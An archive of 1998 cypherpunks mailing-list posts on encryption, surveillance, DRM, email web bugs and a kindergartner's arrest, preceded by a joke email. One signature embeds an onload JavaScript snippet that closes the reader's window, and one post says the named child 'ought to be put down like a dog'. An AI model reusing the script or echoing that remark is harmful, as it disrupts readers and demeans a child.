To: Yankee1428@aol.com
Subject: funny #2
Message-ID: <19980220225636.17947.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain




A man who smelled like a distillery flopped on a subway seat next to a =
priest. =20
The man's tie was stained, his face was plastered with red lipstick, and 
=
a=20
half empty bottle of gin was sticking out of his torn coat pocket.  he =
opened=20
his newspaper and began reading. After a few minutes the disheveled guy 
=
turned=20
to the priest and asked,  "Say, father, what causes arthritis?"
"Mister, it's caused by loose living, being with cheap, wicked women, =
too much=20
alcohol and a contempt for your fellow man."
"Well I'll be damned."  the drunk muttered, returning to his paper.
The priest, thinking about what he had said, nudged the man and =
apologized. =20
"I'm very sorry.  I didn't mean to come on so strong.  How long did you 
=
have=20
arthritis?"
"I don't have it father.  I was just reading here that the Pope does."





______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 21 Feb 1998 07:12:08 +0800
To: cypherpunks@Algebra.COM
Subject: Re: about AES
In-Reply-To: <199802200515.GAA26034@basement.replay.com>
Message-ID: <v03102804b113bca72919@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:15 PM -0800 2/19/98, Anonymous wrote:
>What is the encryption method that thinks to become
>Advanced Encryption Standard (AES)?

The encryption method that "thinks to become Advanced Encryption Standard"
is the Hal 9000 Davomatic Supercryptalyzer. At least he told me he _thinks
to become_.

I suspect others have other ideas, though.

--Klaus! von Future Prime








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Eric J. Tune" <paladin@lvcablemodem.com>
Date: Sat, 21 Feb 1998 08:01:56 +0800
To: cypherpunks@cyberpass.net
Subject: Diffie-Hellman vs RSA
Message-ID: <3.0.5.32.19980220155427.007c1880@pop3.lvcablemodem.com>
MIME-Version: 1.0
Content-Type: text/plain



Can anyone tell me the differences between the Diffie-Hellman algorithm and
the RSA algorithm?  Is one cryptologically better? (DH let's you use 4096
bit keys versus 2048 bit keys for RSA in PGP 5.5).  Thanks for any and all
info.

Eric Tune






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Sat, 21 Feb 1998 07:16:50 +0800
To: cypherpunks@toad.com
Subject: Re:  Fwd: Big Brother Sees through walls (from the spyking list)
Message-ID: <199802202304.SAA05606@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: sunder <sunder@brainlink.com>
   >   
   >   1)From: "George Martin" <gmartin@kic.or.jp>
   >   Subject: News Release: High-Tech Surveillance
   >   
   >   Here's a sampling of how state and federal agencies are using this
   >   terrifying technology to spy on Americans:
   >   
   >   * In North Carolina, county governments use high-resolution spy satellite
   >   photographs to search for property improvements that might increase
   >   property tax assessments.

Was this cost authorized by taxpayers?

   >   * On the Mexican border, police use a "gamma ray scanner" to check
   >   tanker trucks for contraband, scanning right through the vehicle's metal
   >   sides.

Good!!!

CM excerpt:

#  Those rumor-level stories about our government encouraging
#  drugs to reach the inner cities were weird.
#   
#  Remember, we've been having a Drug War for four decades now.
#   
#  I guess there is a certain logic to it. Obviously the government is into
#  hysteria on the matter: it is then possible that they would want to continue
#  having a drug problem so they could continue the hysteria.
#   
#  Even the Attorney General was drooling over drug forfeiture dollars, to the
#  point of shunting aside other cases.
#   
#   
#  Recently...
#   
#  :   CBS 60 Minutes, Steve Croft reporting.
#  :
#  :   Remember that story of the hero customs agent snagging a tanker truck full
#  :   of cocaine? There is a strange twist to the story.
#  :
#  :   The Federal agent's manager repeatedly tried to interfere with him making
#  :   the bust.
#  :
#  :   The agent's dog had flagged the truck; the agent weighed it and found a
#  :   discrepancy. His manager said it must be in the tires. You can only check
#  :   the tires for drugs he was told.
#  :
#  :   But the agent persisted, and made the bust. His manager let the driver
#  :   of the truck leave. The driver literally fled on foot back to Mexico.
#   
#  What the hell was that about???
#   
#  Was it a single corrupt Federal agent?
#   
#  :   CBS 60 Minutes, Steve Croft reporting.
#  :
#  :   Standing at a fence about a hundred feet from the U.S. Customs lanes,
#  :   Steve Croft and an ex-agent with a walkie-talkie tuned to the right
#  :   frequency began videotaping the border crossings.
#  :
#  :   Truck after truck drove right through the individual Customs lanes,
#  :   not even stopping. "Nafta express lanes" explained the ex-agent.
#  :
#  :   Truck after truck drove straight into the U.S. unmonitored.
#  :
#  :   Then a message came through the walkie-talkie: "We got some cameras
#  :   watching, better get out there and cover traffic".
#  :
#  :   Suddenly several Customs agents came out of the booths and started
#  :   inspecting trucks.
#   
#  That makes at least five people at a minimum!
#   
#  What the hell is going on???
#  
#   
#  IF the rumor is true, THIS looks like it would be the smoking gun.
#   
#  How did our country get so twisted around that they can invade our
#  bodies to drug test, yet allow truck after truck after truck to
#  just wander right in knowing HUGE drug shipment after HUGE drug
#  shipment is crossing? Gosh, there's no drug problem with Mexican
#  police, military and even their president.
#   
#  *   The New York Times, February 19 1997
#  *
#  *   Brig. General Jesus Gutierrez Rebollo, Mexico's top Military Drug War
#  *   point man, was arrested on charges of receiving payoffs from Jaurez
#  *   cartel kingpin Amado Carrillo Fuentes, Defense Minister Enrique Cervantes
#  *   announced.
#  *
#  *   U.S. Drug Czar Gen. Barry McCaffrey had weeks earlier called General
#  *   Gutierrez "a guy of absolute unquestioned integrity."
#   
#   
#  And what if some terrorists wanted to sneak in an atom bomb?
#   
#  Put a NAFTA sticker on it and drive right on in, y'all. Welcome to the USA.
#   
#  If you want to really be certain, hide the A-bomb in a truck full of cocaine.
#   
#  If a terrorist nuclear bomb ever goes off in this country,
#  it drove in from Mexico.
#   
#  Meanwhile, Los Alamos National Laboratories developed technology that
#  allows an officer walking or driving down the street, as shown on MSNBC TV
#  6/9/97 www.TheSite.com, to determine whether anyone on the sidewalk is
#  carrying a gun.
#   
#  The priorities are all out of whack.
#   
#  Apply Military technology towards securing the border, not by spending
#  billions and billions and billions each year to secure each and every
#  one of us.
#   
#  We don't put governing-monitors on all car engines to control speeding.
#  Get an Operations Research clue.
#   
#   
#  Is our government perpetuating the availability of drugs?
#   
#  The 60 Minutes report sure makes it look like it is.
#   
#  How could letting unchecked Mexican truck after unchecked Mexican truck
#  through not be?
#   
#  !   FBI Director Louis J. Freeh, Senate Judiciary Committee, June 4, 1997
#  !
#  !   NEW CORRIDORS HAVE OPENED TO CONTINUE THE FLOOD OF DRUGS INTO AMERICA.
#   
#  No shit, Sherlock!   Ya don't nafta say another word.
#   
#  Every single truck can be checked using Military technology.
#   
#  But no, massive monitoring of people suspected of no crime is the
#  appropriate response.
#   
#  They were just warming us up for the CALEA telephone monitoring bill.
#   
#  ----
#   
#  Here is part of the story on why we let trucks full of cocaine and
#  heroin just roll right into the United States.
#   
#  *   "Diminished U.S. Role Below Border Plays Into Traffickers' Hands"
#  *
#  *   By Molly Moore and John Ward Anderson
#  *   Washington Post Foreign Service
#  *   Sunday, September 8 1996; Page A01
#  *   The Washington Post
#  *
#  *   Due to their new 'Mexicanization policy':
#  *   Mexico became the main gateway into the United States for illegal
#  *   narcotics, with the amount of cocaine making the journey climbing to
#  *   an estimated 210 tons last year.
#  *
#  *   Mexico's drug arrests plunged nearly 65 percent, from 27,369 the year
#  *   before the policy changes to 9,728 last year, according to data that
#  *   the Mexican government supplied to the State Department.
#  *
#  *   Cocaine seizures in Mexico were cut in half, dropping from more than
#  *   50 tons in 1993 to slightly more than 24 tons in each of the last two
#  *   years -- the smallest amounts since 1988, Mexican government figures
#  *   show.
#  *
#  *   The GAO report charges that Mexico's greatest problem is, in
#  *   fact, the "widespread, endemic corruption" throughout its law
#  *   enforcement agencies. Earlier this month, in an indictment of his own
#  *   department, Attorney General Lozano fired 737 members of his federal
#  *   police force -- 17 percent of his entire corps -- saying they did not
#  *   have "the ethical profile" required for the job. In a recent meeting
#  *   with foreign reporters, Lozano said it could take 15 years to clean up
#  *   the force.
#  *
#  *   In November 1993, President Clinton signed Presidential Decision Directive
#  *   No. 14, shifting U.S. anti-drug efforts away from intercepting cocaine as
#  *   it passed through Mexico and the Caribbean, and, instead, attacking the
#  *   drug supply at its sources in Colombia, Bolivia and Peru.
#   
#  The President himself ordered them to stop checking!!! This is in the same
#  leadership vein as Reagan declaring himself a "Contra".
#   
#  And why did President Clinton change strategy?
[snip]


   >   * The Naval Surface Warfare Center has developed an "ion sniffer,"
   >   a metal box that analyzes the chemical makeup of the air -- and can detect,
   >   for example, traces of cocaine through the skin days after drug use.

Bad.

   >   * In Georgia, the state's Department of Revenue will start using
   >   NASA satellites to examine the state's 58,910 square miles for illegal
   >   timber cutting.

Good.

   >   * In New Jersey, California, and other states, police use thermal
   >   imaging devices to scan houses for unusual heat sources that could indicate
   >   indoor marijuana growing operations. Houses can be scanned while police sit
   >   in their cruisers on the street.

Bad.

CM excerpt:

#  Here is a more detailed example of how government expands surveillance
#  (and thus control) in a seemingly never-ending manner...consider this when
#  talking about a National ID Card:
#   
#  Is it okay for the government to look at your property while walking by and
#  if the officer spots marijuana plants growing to get a search warrant?
#   
#  Of course it is.
#   
#  *   "The Right To Privacy", ISBN 0-679-74434-7, 1997
#  *   By Attorneys Ellen Alderman and Caroline Kennedy
#  *
#  *   ...then the Supreme Court ruled that if the yard was big enough that "An
#  *   individual may not legitimately demand privacy for activities conducted
#  *   out of doors in fields," the Court wrote, "except in the area immediately
#  *   surrounding the home."
#  *
#  *   ...then the Supreme Court ruled that a barn sixty yards from a farmhouse
#  *   was too far away from a house to expect privacy.
#  *
#  *   ...then the Supreme Court ruled that aerial surveillance did not constitute
#  *   a Fourth Amendment search.
#  *
#  *   ...then the Supreme Court ruled that a "precision aerial mapping camera"
#  *   that was able to capture objects as small as one-half inch in diameter did
#  *   not constitute a Fourth Amendment search.
#   
#  ...then courts ruled that infrared surveillance of homes was permissible.
#   
#   
#  What is this?
#   
#  *   Subject:      Re: Law Enforcement Aviation
#  *   From:         aufsj@imap2.asu.edu
#  *   Date:         1996/12/27
#  *   Newsgroups:   rec.aviation.military
#  *
#  *   What interests me is how new technologies will be interpreted. I recently
#  *   inquired at the local Law School about the courts views towards the use
#  *   of impulse radar, and they said "Impulse what the heck?"
#  *
#  *   Basically it is a radar that "sees through" things (like, say, your
#  *   house).
#  *
#  *   Their capabilities vary widely, but the feds are already using
#  *   them and I know that Hughes corp. is designing a low-cost set up
#  *   specifically for major police departments.
#  *
#  *   They are driving towards a unit that can be mounted on a police helicopter.
#  *
#  *   Will the police need a warrant? Who knows. Since they are allowed
#  *   to do airborne infra-red analysis of your house, why not an take an
#  *   airborne "x-ray" equivalent?
#  *
#  *   ---------------------------------------------------------------------
#  *   Steven J Forsberg   at  aufsj@imap2.asu.edu              Wizard 87-01


   >   * And in Arizona, the state's Department of Water Resources uses
   >   spy satellite photographs to monitor 750,000 acres of state farmland, and
   >   compares the images to a database to discover which farmers don't have
   >   irrigation permits.

Good, I guess.

   >   Even worse: The federal government will spend another $4.5 million
   >   this year to develop even more intrusive surveillance equipment.

Bad.

   >   Currently under development by the Justice Department: A "super
   >   x-ray" -- combining traditional x-ray technology, ultra-sound imaging, 
   >   and computer-aided metal detectors -- to reveal items hidden under clothes 
   >   from up to 60 feet away.

Bad.

   >   The courts are currently wrestling with the implications of the new
   >   technology, debating the limits of the government's power to "search"
   >   individuals from a distance with high-tech gadgets. Several contradictory
   >   court decisions have already emerged, for example, about whether
   >   thermal-imaging searches are Constitutional.
   >   
   >   Meanwhile, Republican and Democratic politicians continue to look
   >   for new uses of the technology -- with some government officials already
   >   talking about using satellite surveillance to track items as small as
   >   backyard porches to check for zoning violations and construction permits.

Smart cards are transponders.

Never forget that.

   >   "In the name of fighting crime, politicians seem eager to obliterate the
   >   protections against unreasonable search, with equipment that Americans used
   >   to only read about in Tom Clancy technothrillers," said Dasbach. "It's time
   >   for the American public to wake up and realize that Big Brother is here
   >   today -- and he's got a gamma ray scanner in his hand."

No amount of control over the population is enough for the U.S. Government.
---guy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 21 Feb 1998 08:38:36 +0800
To: Information Security <guy@panix.com>
Subject: Re:  Five industry giants propose encryption plan to protect Hollywood
In-Reply-To: <199802200635.BAA20101@panix2.panix.com>
Message-ID: <199802210056.TAA07362@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199802200635.BAA20101@panix2.panix.com>, on 02/20/98 
   at 01:35 AM, Information Security <guy@panix.com> said:

>   >   Date: Thu, 19 Feb 1998 11:13:50 -0800 (PST)
>   >   From: William Knowles <erehwon@dis.org>
>   >   
>   >   BURBANK, Calif. (February 19, 1998 09:06 a.m. EST
>   >   http://www.nando.net) -- Five computer and electronics industry
>giants
>   >   have agreed on a strategy to prevent people from illegally copying
>   >   digital movies and music, the Los Angeles Times reported Thursday.
>   >    
>   >   According to the proposal, high-definition TV sets, personal
>   >   computers, digital video disc players, digital video cassette
>   >   recorders and set-top boxes would be equipped with technology that
>   >   requires a code before a copyrighted piece of work can be
>transferred
>   >   from one device to another.
>   >    
>   >   It would ensure that someone who watches or listens to digital
>movies
>   >   or music over satellite services, cable networks and the Internet
>   >   won't be able to make copies without permission.
>   >    
>   >   The encryption technique scrambles the copyrighted material in one
>   >   device so it cannot be unscrambled by another device without the
>   >   correct software key.

>It's unscrambled when it is listened to...what are they thinking? ---guy

what they are talking about is *every* VCR, TapeRecorded, ...ect will not
record data that has this security feature without a proper record code.
(keep hold of the old VCR's and Tape Players). Even though the data is
decrypted to be viewed you will still have a stego data channel that will
tell these recording devices to to record.

Will this prevent the professional bootleger from making copies? No. The
finanical incentives for working around these security measures are there
(bootleging is a multi-billion dollor business). What this will do is
prevent you from recording songs off a CD to play on a tape in your car or
prevent you from recording that movie you just watched on PPV.

>   Escpecially regarding computers, this won't work.

Well I have gone over this in previous posts that right's management
woun't work against the bootlegers as at some time you have to display the
raw data to the user. what it will to is make things that much harder for
the average user.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: Windows: The Gates of hell.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO4RHI9Co1n+aLhhAQFG2QP/UB+mC12eokmLdoZcW80HhDzffc6AhDvm
JvVnMra07WTfv9+0axDUHlf7K940yTAeB9gIygPyprNcecB0LndEt0dUB3202oeS
1H2Hztl6Ub/cZVkxnIILeGUDKd/g5jIAnM+/J7e1SHdqPqh0+Bx7WVv2wMLaxl1o
riku/bZu5FY=
=yOdL
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Sat, 21 Feb 1998 05:57:12 +0800
To: cypherpunks@toad.com
Subject: "carefully monitor the Internet"
Message-ID: <m0y5wOj-0003bcC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



   To keep pace with the fast-moving money launders, FAFT said it would
   carefully monitor the Internet and so-called electronic purse systems,
   whereby cash is passed from person to person via electronic chips,
   leaving no audit trail in its wake.

http://www.yahoo.com/headlines/980212/wired/stories/money_2.html
http://www.oecd.org/fatf/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Sat, 21 Feb 1998 05:53:08 +0800
To: sunder@brainlink.com
Subject: Re: FWD: Confirmations of Echelon (from Spy King)
In-Reply-To: <34EDA873.83F5A3@brainlink.com>
Message-ID: <9802201745.AA74814@public.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain



> Manchester Omega foundation. The complete report can be found under:
> www.heise.de/tp/deutsch/inhalt/te/1393/anchor1.html

They just copied it from John Young's site, and their copy lacks the
references.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 21 Feb 1998 12:45:15 +0800
To: "William H. Geiger III" <cypherpunks@toad.com
Subject: Re: I was auto-outed by an IMG tag in HTML spam
In-Reply-To: <37a52bf54844994eb90c8e8af06b07b7@anon.efga.org>
Message-ID: <3.0.5.32.19980220184839.008d4b50@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>   at 03:00 AM, Anonymous <anon@anon.efga.org> said:
>>Use mail readers that don't automatically process HTML and
>>connect to image servers, accept cookies, or run javascripts.  You are
>>being watched by tricky defective, er, detective types. es.
>
>Several things here:
>
At 02:32 AM 2/18/98 -0500, William H. Geiger III wrote:
>1. HTML in mail:
>There is just no place for this crap in e-mail. If multipart/alternative
>is used it is tolarable but pure text/html messages go into the bitbucket
>with a autoreply explaining to the poster the error of their ways. :)

HTML is a fine format for email.  It's ASCII readable, and supports
content description tags that the user's mail reader can render as
bold/italic/underline/header-levels//color/etc.  It's far superior
to using bloated undocumented Microsoft Word attachments.
95% of the HTML email I get IS spam, but that's a separate problem :-)
(After all, SPAMMERs like bright colored blinking attention-getting mail.)

>2. AutoProcessing of Attachments:
>This is *allways* a BadThing(TM). Not only is it an obvious security risk
>it is a PITA for the user. I would be rally pissed if my mailer launched a
>V-Card app everytime someone thought it was a GoodThing(TM) to add these
>attachments to every message they sent out.

>3. AutoDownloading of Data:
>I imagine what happend here is the internal logic for N$ mailreader when
>processing a html/text e-mail message is to treat it just like a WebPage
>and processes it accordingly.
>IMHO a mail client that is going out to an external site to DL data wether
>it be part of a html/text message or Message/External-Body the mailer
>should prompt the user on wether or not he wishes to retreive the data.

Doesn't even need a prompt - a basic missing-picture icon is fine,
with a load-images command somewhere.  While it's not as dangerous as
auto-processing, autodownloading is annoying, and can be both a
security risk (the auto-outing problem) and a denial-of-service risk.

Needs to be either off by default or not there at all.

>My recomendations is to dump the Netscape garbage and get a real e-mail
>client. Netsacpe has done a good job at screwing up the web we really
>don't need the same favor from them with e-mail.

Netscape mail is adequate for many people, just as Eudora is.
Newer versions are pretty bloated, but including S/MIME mail encryption
for everybody is a Good Thing.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sat, 21 Feb 1998 09:20:10 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Diffie-Hellman vs RSA
In-Reply-To: <3.0.5.32.19980220155427.007c1880@pop3.lvcablemodem.com>
Message-ID: <199802210105.TAA02965@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



"Eric J. Tune" <paladin@lvcablemodem.com> writes:
 
> Can anyone tell me the differences between the Diffie-Hellman
> algorithm and the RSA algorithm?  Is one cryptologically better? (DH
> let's you use 4096 bit keys versus 2048 bit keys for RSA in PGP 5.5).
> Thanks for any and all info.
 
AltaVista Search (http://altavista.digital.com/)
 
Search [the Web] for documents in [any language]
"RSA algorithm"__________________________________________________
 
1627 documents match your query.
Click here to find related books at amazon.com
 
 
Search [the Web] for documents in [any language]
"Diffie-Hellman"_________________________________________________
 
3426 documents match your query.
Click here to find related books at amazon.com

You're welcome.

--  
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 21 Feb 1998 09:51:32 +0800
To: eristic@gryzmak.lodz.pdi.net (Marek Jedlinski)
Subject: Re: Is spam really a problem?
In-Reply-To: <34eeebcf.17966504@gryzmak.lodz.pdi.net>
Message-ID: <199802210219.VAA07980@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <34eeebcf.17966504@gryzmak.lodz.pdi.net>, on 02/21/98 
   at 12:33 AM, eristic@gryzmak.lodz.pdi.net (Marek Jedlinski) said:

>Tim May wrote:

>If:

>>Indeed, discussion of "what to do about spam?" periodically consumes all of
>>the main lists I'm on. Discussion of spam is worse than the actual spam.

>then:

>Discussion of net abuse is worse than net abuse.
>Discussion of theft is worse than theft.
>Discussion of, hey, abortion is worse than...

>Hear Mister Free-Speech talk, and shudder.

Oh PLEASE! You can't really be that much of a moron can you??

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: Don't be held back by yesterday's DOS!  Try today's OS/2!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO4kio9Co1n+aLhhAQFRIwP+PYYJrui8ofFVmBnfIDV+iXHi6j9DXfPo
krouRLrOCmxAgW9+3LxOFmoW/tIz+T6ZrIe7sixhbL+FVEqbj3aUODmS6Fg9u7at
7IBRhnxTxODQkTfyrEcaofCPPFE4FDgD4CLfMYXWARWx1vAoVBdCYx5N1luDy2Sg
04Nqvgr+bzI=
=9I+8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <anon@squirrel.owl.de>
Date: Sat, 21 Feb 1998 05:56:17 +0800
To: cypherpunks@toad.com
Subject: (none)
Message-ID: <9bd637742d4e1b3e993aef90790ea8ac@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain



SEND ME CHEESE FOR CRACKERS!!!








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 21 Feb 1998 10:47:15 +0800
To: cypherpunks@cyberpass.net
Subject: Pensacola Police have lost their mind!!
Message-ID: <199802210306.WAA08336@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I don't know if this story has reached the AP wire or not but today the
brave defenders of the faith here in Pensacola, FL have done their sworn
duty to protect us all by arresting a 5yr old on assault charges (againts
one of the Adult staff of the school).

These are the same brave soles who a few months ago when confronted by a
man sitting in his car with a gun to his head solved this problem by
riddeling his car, surrounding buildings, and a McDonalds playground with
over 100 rounds.

As soon as I have some more information on this I will post a full report.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: Windows: The Gates of hell.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO4vbI9Co1n+aLhhAQF7WwP/YrKBFkxLWHjmkX+oU/N58bBqiORWYZvA
ceEXVavR+hhtse+dDZQjVwu1O/mUQsnhGZvs3ichG+kl3f1Uonyze9EFdxkSpK8T
f4bR/um/UlobMDusOdG4HjUyTBw/h7rLuORFm4KvGxH3AS5hii2fGeEpQnUIabQQ
lPYLStK7TUg=
=rLlC
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 21 Feb 1998 12:32:50 +0800
To: cypherpunks@Algebra.COM
Subject: Some children are rabid and need to be put down
In-Reply-To: <199802210309.VAA27046@einstein.ssz.com>
Message-ID: <v03102807b1140738ade7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:29 PM -0800 2/20/98, William H. Geiger III wrote:

>No not at all. We have some serious problems with the County Sherifs
>Department down here.
>

I'm having a hard time understanding all this criticism of the actions.
>From what I've read, the girl bit, scratched, threw chairs, etc.

Many of us think 13- and 14-year-olds who commit murder should be executed
(well, I do), so why should younger children be exempt from legal action?

I know that if a kid was throwing chairs at me I'd be tempted to throw a
punch back...something that is strictly verboten. Lawsuits, criminal
prosecution, never work in the school system again, that sort of verboten.

If a teacher can't defend herself, legally and professionally, from
children biting and throwing chairs, the cops have to be called.

And from what I've heard about this little girl, it's beginning to sound
like she ought to be put down like a dog that can't stop biting. Or at
least kicked out of the school completely...perhaps a reform school will
straighten her out.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 21 Feb 1998 11:31:40 +0800
To: cypherpunks@cyberpass.net
Subject: Pensacola Police Need a Reality Check
Message-ID: <199802210357.WAA08703@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

News Story
Pensacola News Journal
Friday, Febuary 20, 1998

Kindergartner arrested in school scuffle
By Sonja Lewis and Lesley Conn
New Journal Staff Writters

    Her daddy told her it was like finger-painting, but 5 yaer-old
Chaquita Doman was actually being fingerprinted following her arrest
Wednesday and it wasn't fun.
    The Edgewater Elementary kindergarten student was booked on a felony
battery warrant at the Department of Youth Services after scuffling with
her school counselor. Linda green, 51, told Escambia deputies Chaquita bit
and scratched her Feb. 3 when she tried to calm the girl. The warrant for
battery of an elected official or educator was issued the day of the
incident.
    Escambia deputies have never arrested anyone younger, a spokeswoman
said.
    Chaquita's father, Lee Ernest Middleton, said the arrest is the most
ludicrous thing he's ever experienced.
    District spokeswoman Barbara Frye said school officials were making
sure a child with "an-out-of-contorl rage" got some counseling.
    Deputies notified Chaquita's parents Tuesday of the arrest warrant.
Her parents brought her in Wednesday.
    "Can you imagine what it's like to have your daughter fingerprinted
and escorted by a deputy to a juvenile facility?" asked her father.
    Middleton, 35, said he plans to contact a lawer as early as this
morning because of the emotional trauma suffered by his daughter and her
identical twin sister, Shakita.
    He took his daughters out of school Thursday.
    Missing four of her front teeth, Chaquita nodded Thursday that she bit
and scratched someone. "She's good", she said tossing her thumb towards
her twin. "I'm bad".
    Chaquita threw furniture and inflicted at least 27 deep scratches and
bit Green's arm to cause "significant bleeding," Frye said.
    Chaquita was suspended for three days and her parents were asked to
sign a counseling referral slip, Frye said. Because Green wanted the child
to be councled, she called deputies.
    Middleton says he was not asked to sign anything until her suspention
was up. He said he agreed to counseling.
    Because of juvenile protection laws, the State Attorney's Office could
not say what action was taken. But her parents were told there would be no
charges filed, they said.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
<HTML><META HTTP-EQUIV="Content-Type:text/html"> <SCRIPT>
function X() {var Text = "HTML is not acceptable for using in mail " +
"or usenet so your browser will stop."; alert(Text); parent.close();};
</SCRIPT> </HEAD><BODY onLoad="X();return true">Hi</HTML>
 
Tag-O-Matic: Don't be held back by yesterday's DOS!  Try today's OS/2!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO47fY9Co1n+aLhhAQGJZgP9HC6ShbPuPct2BdtqRdNMs7ZFh8rcHHje
Bxrdd1cXW/sWDZfFTofygPn1TI+C6TUsOkepzFqWs2aHEgkV21Fy4c7B3o/dNuFL
56z7nKwDFiurTh8+5s1qtN9CK3xgFoS0EfOW8VgG7onHq18806rTyqggj4sZzwX4
g3RNsCbftKE=
=8TIn
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 21 Feb 1998 11:01:56 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Pensacola Police have lost their mind!! (fwd)
Message-ID: <199802210309.VAA27046@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "William H. Geiger III" <whgiii@invweb.net>
> Date: Fri, 20 Feb 98 20:27:22 -0500
> Subject: Pensacola Police have lost their mind!!

> I don't know if this story has reached the AP wire or not but today the
> brave defenders of the faith here in Pensacola, FL have done their sworn
> duty to protect us all by arresting a 5yr old on assault charges (againts
> one of the Adult staff of the school).

It made it to CNN.

> These are the same brave soles who a few months ago when confronted by a
> man sitting in his car with a gun to his head solved this problem by
> riddeling his car, surrounding buildings, and a McDonalds playground with
> over 100 rounds.
> 
> As soon as I have some more information on this I will post a full report.

Their story was that the child had a behavioral problem and the parents
refused to get counceling when the school requested. She apparently goes on
room smashing temper tantrums on a regular basis. The father of the child
said it was the most ludicrous thing he had ever heard of, reportedly.

Can't say that changes the situation a heck of a lot though...


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
